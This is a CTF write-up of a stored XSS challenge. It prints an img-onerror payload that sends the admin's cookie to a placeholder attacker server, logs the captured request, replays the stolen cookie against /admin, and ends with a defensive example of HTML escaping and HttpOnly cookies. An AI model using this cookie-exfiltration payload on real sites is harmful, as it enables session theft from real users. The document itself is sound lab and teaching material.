Tags: web xss 


# ▼▼▼Xmas Still Stands (Web, 50pts, 464/1596=29.1%)▼▼▼
## ※XSS basic problem

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
POST /post HTTP/1.1
Host: xmas.2020.chall.actf.co
Content-Type: application/x-www-form-urlencoded

content=<img+src=X+onerror="location=`https://my_server/`+document.cookie" >
```

↓ After reporting the post id to the admin, the admin's browser executes the payload and sends a request to my_server

```
GET /inspect/01e3c539tf42w5hje1vehjjhk1/super_secret_admin_cookie=hello_yes_i_am_admin;%20admin_name=John HTTP/1.1
requestinspector.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US
User-Agent: John's browser
Referer: http://127.0.0.1:3000/posts/933
Accept-Encoding: gzip
```

The following admin cookie was obtained

`super_secret_admin_cookie=hello_yes_i_am_admin; admin_name=John`

↓ Sending the obtained cookie to /admin

```
GET /admin HTTP/1.1
Host: xmas.2020.chall.actf.co
Cookie: super_secret_admin_cookie=hello_yes_i_am_admin;admin_name=John
```

`flag is actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}`
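The flag spells out the fix. As an added example (not part of the original writeup), the following Node.js snippet shows the two server-side mistakes the challenge combines and how each is closed: the post content is concatenated into the page unescaped, and the admin cookie is readable from `document.cookie`. `renderPostUnsafe`, `renderPostSafe`, `escapeHtml`, `adminCookieHeader` and the cookie attributes chosen are assumptions of this example, not the challenge's code; the sample input is the payload from the request above, as the server sees it after form decoding.

```javascript
// Added example, not code from the challenge. Shows the vulnerable renderer beside an
// escaped one, and an HttpOnly session cookie that document.cookie cannot read.

// Constructed sample input: the writeup's payload after URL-decoding the form body
// ('+' in application/x-www-form-urlencoded becomes a space).
const POSTED_CONTENT =
  '<img src=X onerror="location=`https://my_server/`+document.cookie" >';

// Vulnerable version: user content is concatenated straight into the markup,
// so any tag in the post becomes part of the page the admin views.
function renderPostUnsafe(content) {
  return `<div class="post">${content}</div>`;
}

// Escape the five characters that can start a tag, end a tag, or break out of a
// quoted attribute. The result is safe as element text or as a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Hardened version: same layout, content escaped at the output boundary.
function renderPostSafe(content) {
  return `<div class="post">${escapeHtml(content)}</div>`;
}

// Illustrative check (a regex, not an HTML parser): does the rendered HTML contain
// a tag carrying an on* event-handler attribute?
function hasEventHandlerTag(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Set-Cookie value for the admin session. HttpOnly keeps it out of document.cookie;
// Secure and SameSite limit where the browser sends it. The name and value are the
// writeup's; the attribute set is this example's assumption.
function adminCookieHeader(name, value) {
  return `${name}=${value}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Models what document.cookie exposes: only cookies set without HttpOnly.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Stand-alone demo: compare both renderers and the cookie visibility on the sample input.
console.log('unsafe render has handler tag:', hasEventHandlerTag(renderPostUnsafe(POSTED_CONTENT)));
console.log('safe render has handler tag:  ', hasEventHandlerTag(renderPostSafe(POSTED_CONTENT)));
console.log('safe render:', renderPostSafe(POSTED_CONTENT));
console.log(
  'script-visible cookies:',
  JSON.stringify(
    scriptVisibleCookies([
      adminCookieHeader('super_secret_admin_cookie', 'hello_yes_i_am_admin'),
      'theme=dark; Path=/',
    ])
  )
);
```

Escaping at output is the general fix for stored XSS of this kind; HttpOnly is defence in depth, since it does not stop script execution but does stop the `document.cookie` exfiltration this challenge relies on.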

vbv2312207, March 19, 2020, 7:16 p.m.

I am a beginner, can you please tell a bit more extensively how and what to do